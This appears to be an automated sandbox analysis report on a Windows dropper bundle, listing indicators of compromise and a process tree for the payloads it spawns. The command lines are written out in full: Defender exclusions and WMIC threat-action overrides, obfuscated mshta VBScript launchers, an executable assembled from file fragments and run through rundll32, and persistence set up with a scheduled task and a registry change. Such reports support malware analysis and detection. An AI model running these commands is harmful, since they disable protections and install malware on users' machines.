\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Fri10d184202996a0d7f.exepowershell.exe6450217.scr7375211.scrWerFault.exeWerFault.exe7138906.scrWerFault.exepid process 4768 Fri10d184202996a0d7f.exe 4768 Fri10d184202996a0d7f.exe 4144 powershell.exe 4144 powershell.exe 4144 powershell.exe 5420 6450217.scr 5420 6450217.scr 5200 7375211.scr 5200 7375211.scr 5112 WerFault.exe 5112 WerFault.exe 5892 WerFault.exe 5892 WerFault.exe 5856 7138906.scr 5856 7138906.scr 5640 WerFault.exe 5640 WerFault.exe 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 4460 -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
foldershare.exepid process 3196 5116 foldershare.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
QJDpWADJj1cP20LBomCpIKc_.exepid process 5432 QJDpWADJj1cP20LBomCpIKc_.exe -
Suspicious behavior: SetClipboardViewer 4 IoCs
Processes:
8754910.scr4315878.scr1977511.scr6296066.scrpid process 420 8754910.scr 1632 4315878.scr 3020 1977511.scr 1896 6296066.scr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Fri10720d229511df563.exeFri103a7805577.exeFri10b0a06a73706.exepowershell.exetaskkill.exe7138906.scrDownFlSetup110.exeShadowVPNInstaller_t3.exe6.exeWerFault.exeultramediaburner.exe6066875.scrFri106e757f6d75.exe5570170.scrtaskkill.exe1750641.scr6450217.scr7375211.scrdescription pid process Token: SeCreateTokenPrivilege 4536 Fri10720d229511df563.exe Token: SeAssignPrimaryTokenPrivilege 4536 Fri10720d229511df563.exe Token: SeLockMemoryPrivilege 4536 Fri10720d229511df563.exe Token: SeIncreaseQuotaPrivilege 4536 Fri10720d229511df563.exe Token: SeMachineAccountPrivilege 4536 Fri10720d229511df563.exe Token: SeTcbPrivilege 4536 Fri10720d229511df563.exe Token: SeSecurityPrivilege 4536 Fri10720d229511df563.exe Token: SeTakeOwnershipPrivilege 4536 Fri10720d229511df563.exe Token: SeLoadDriverPrivilege 4536 Fri10720d229511df563.exe Token: SeSystemProfilePrivilege 4536 Fri10720d229511df563.exe Token: SeSystemtimePrivilege 4536 Fri10720d229511df563.exe Token: SeProfSingleProcessPrivilege 4536 Fri10720d229511df563.exe Token: SeIncBasePriorityPrivilege 4536 Fri10720d229511df563.exe Token: SeCreatePagefilePrivilege 4536 Fri10720d229511df563.exe Token: SeCreatePermanentPrivilege 4536 Fri10720d229511df563.exe Token: SeBackupPrivilege 4536 Fri10720d229511df563.exe Token: SeRestorePrivilege 4536 Fri10720d229511df563.exe Token: SeShutdownPrivilege 4536 Fri10720d229511df563.exe Token: SeDebugPrivilege 4536 Fri10720d229511df563.exe Token: SeAuditPrivilege 4536 Fri10720d229511df563.exe Token: SeSystemEnvironmentPrivilege 4536 Fri10720d229511df563.exe Token: SeChangeNotifyPrivilege 4536 Fri10720d229511df563.exe Token: SeRemoteShutdownPrivilege 4536 Fri10720d229511df563.exe Token: SeUndockPrivilege 4536 Fri10720d229511df563.exe Token: SeSyncAgentPrivilege 4536 Fri10720d229511df563.exe Token: SeEnableDelegationPrivilege 4536 Fri10720d229511df563.exe Token: SeManageVolumePrivilege 4536 Fri10720d229511df563.exe Token: SeImpersonatePrivilege 4536 Fri10720d229511df563.exe Token: SeCreateGlobalPrivilege 4536 Fri10720d229511df563.exe Token: 31 4536 Fri10720d229511df563.exe Token: 32 4536 Fri10720d229511df563.exe Token: 33 4536 Fri10720d229511df563.exe Token: 34 4536 Fri10720d229511df563.exe Token: 35 4536 Fri10720d229511df563.exe Token: SeDebugPrivilege 4880 Fri103a7805577.exe Token: SeDebugPrivilege 1192 Fri10b0a06a73706.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeDebugPrivilege 5976 taskkill.exe Token: SeDebugPrivilege 5856 7138906.scr Token: SeDebugPrivilege 5440 DownFlSetup110.exe Token: SeIncBasePriorityPrivilege 1004 ShadowVPNInstaller_t3.exe Token: SeDebugPrivilege 1004 ShadowVPNInstaller_t3.exe Token: SeLoadDriverPrivilege 1004 ShadowVPNInstaller_t3.exe Token: SeDebugPrivilege 5936 6.exe Token: SeRestorePrivilege 5112 WerFault.exe Token: SeBackupPrivilege 5112 WerFault.exe Token: SeBackupPrivilege 5112 WerFault.exe Token: SeDebugPrivilege 4768 ultramediaburner.exe Token: SeDebugPrivilege 5296 6066875.scr Token: SeDebugPrivilege 5616 Fri106e757f6d75.exe Token: SeDebugPrivilege 4600 5570170.scr Token: SeDebugPrivilege 1656 taskkill.exe Token: SeDebugPrivilege 5708 Token: SeDebugPrivilege 3784 1750641.scr Token: SeDebugPrivilege 5420 6450217.scr Token: SeDebugPrivilege 5200 7375211.scr Token: SeIncreaseQuotaPrivilege 4144 powershell.exe Token: SeSecurityPrivilege 4144 powershell.exe Token: SeTakeOwnershipPrivilege 4144 powershell.exe Token: SeLoadDriverPrivilege 4144 powershell.exe Token: SeSystemProfilePrivilege 4144 powershell.exe Token: SeSystemtimePrivilege 4144 powershell.exe Token: SeProfSingleProcessPrivilege 4144 powershell.exe Token: SeIncBasePriorityPrivilege 4144 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
setup_2.tmpultramediaburner.tmpmsedge.exeinstaller.exepid process 556 setup_2.tmp 5532 ultramediaburner.tmp 5628 msedge.exe 5832 installer.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
cmd.execmd.exepid process 7212 cmd.exe 7348 cmd.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3196 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 476 wrote to memory of 3592 476 setup_x86_x64_install.exe setup_installer.exe PID 476 wrote to memory of 3592 476 setup_x86_x64_install.exe setup_installer.exe PID 476 wrote to memory of 3592 476 setup_x86_x64_install.exe setup_installer.exe PID 3592 wrote to memory of 4712 3592 setup_installer.exe setup_install.exe PID 3592 wrote to memory of 4712 3592 setup_installer.exe setup_install.exe PID 3592 wrote to memory of 4712 3592 setup_installer.exe setup_install.exe PID 4712 wrote to memory of 4648 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4648 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4648 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4540 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4540 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4540 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4704 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4704 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4704 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4596 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4596 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4596 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4496 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4496 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4496 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4784 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4784 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4784 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 5036 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 5036 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 5036 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4912 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4912 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4912 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4884 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4884 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4884 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 908 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 908 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 908 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 3192 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 3192 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 3192 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 1184 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 1184 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 1184 4712 setup_install.exe cmd.exe PID 4596 wrote to memory of 1192 4596 cmd.exe Fri10b0a06a73706.exe PID 4596 wrote to memory of 1192 4596 cmd.exe Fri10b0a06a73706.exe PID 4496 wrote to memory of 5064 4496 cmd.exe Fri1015b9a4e0b.exe PID 4496 wrote to memory of 5064 4496 cmd.exe Fri1015b9a4e0b.exe PID 4496 wrote to memory of 5064 4496 cmd.exe Fri1015b9a4e0b.exe PID 4540 wrote to memory of 5060 4540 cmd.exe Fri1034cd265b5e0adcd.exe PID 4540 wrote to memory of 5060 4540 cmd.exe Fri1034cd265b5e0adcd.exe PID 4540 wrote to memory of 5060 4540 cmd.exe Fri1034cd265b5e0adcd.exe PID 4704 wrote to memory of 4460 4704 cmd.exe Fri10584c049c7f.exe PID 4704 wrote to memory of 4460 4704 cmd.exe Fri10584c049c7f.exe PID 4704 wrote to memory of 4460 4704 cmd.exe Fri10584c049c7f.exe PID 4712 wrote to memory of 4584 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4584 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 4584 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 2088 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 2088 4712 setup_install.exe cmd.exe PID 4712 wrote to memory of 2088 4712 setup_install.exe cmd.exe PID 5036 wrote to memory of 4248 5036 cmd.exe Fri1008c7d6874.exe PID 5036 wrote to memory of 4248 5036 cmd.exe Fri1008c7d6874.exe PID 5036 wrote to memory of 4248 5036 cmd.exe Fri1008c7d6874.exe PID 4884 wrote to memory of 5004 4884 cmd.exe Fri1018ef4aa251c026c.exe PID 4884 wrote to memory of 5004 4884 cmd.exe Fri1018ef4aa251c026c.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1034cd265b5e0adcd.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1034cd265b5e0adcd.exeFri1034cd265b5e0adcd.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1034cd265b5e0adcd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1034cd265b5e0adcd.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1034cd265b5e0adcd.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1034cd265b5e0adcd.exe" ) do taskkill -F -Im "%~nXU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "11⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM12⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "Fri1034cd265b5e0adcd.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10584c049c7f.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10584c049c7f.exeFri10584c049c7f.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\GsPD1a5eAJ9Jw9nfgKLNz8PO.exe"C:\Users\Admin\Documents\GsPD1a5eAJ9Jw9nfgKLNz8PO.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\eYuy3U7eqI1easqJ7m0JNK0n.exe"C:\Users\Admin\Documents\eYuy3U7eqI1easqJ7m0JNK0n.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\8⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\9⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\QEliWEwBXSCfyOQAn9k2VE4B.exe"C:\Users\Admin\Documents\QEliWEwBXSCfyOQAn9k2VE4B.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\8014160.scr"C:\Users\Admin\AppData\Roaming\8014160.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\4315878.scr"C:\Users\Admin\AppData\Roaming\4315878.scr" /S7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\Documents\dmrBfO7BJsW2oFCdhI47tfnc.exe"C:\Users\Admin\Documents\dmrBfO7BJsW2oFCdhI47tfnc.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS2243.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4CCE.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
- Blocklisted process makes network request
-
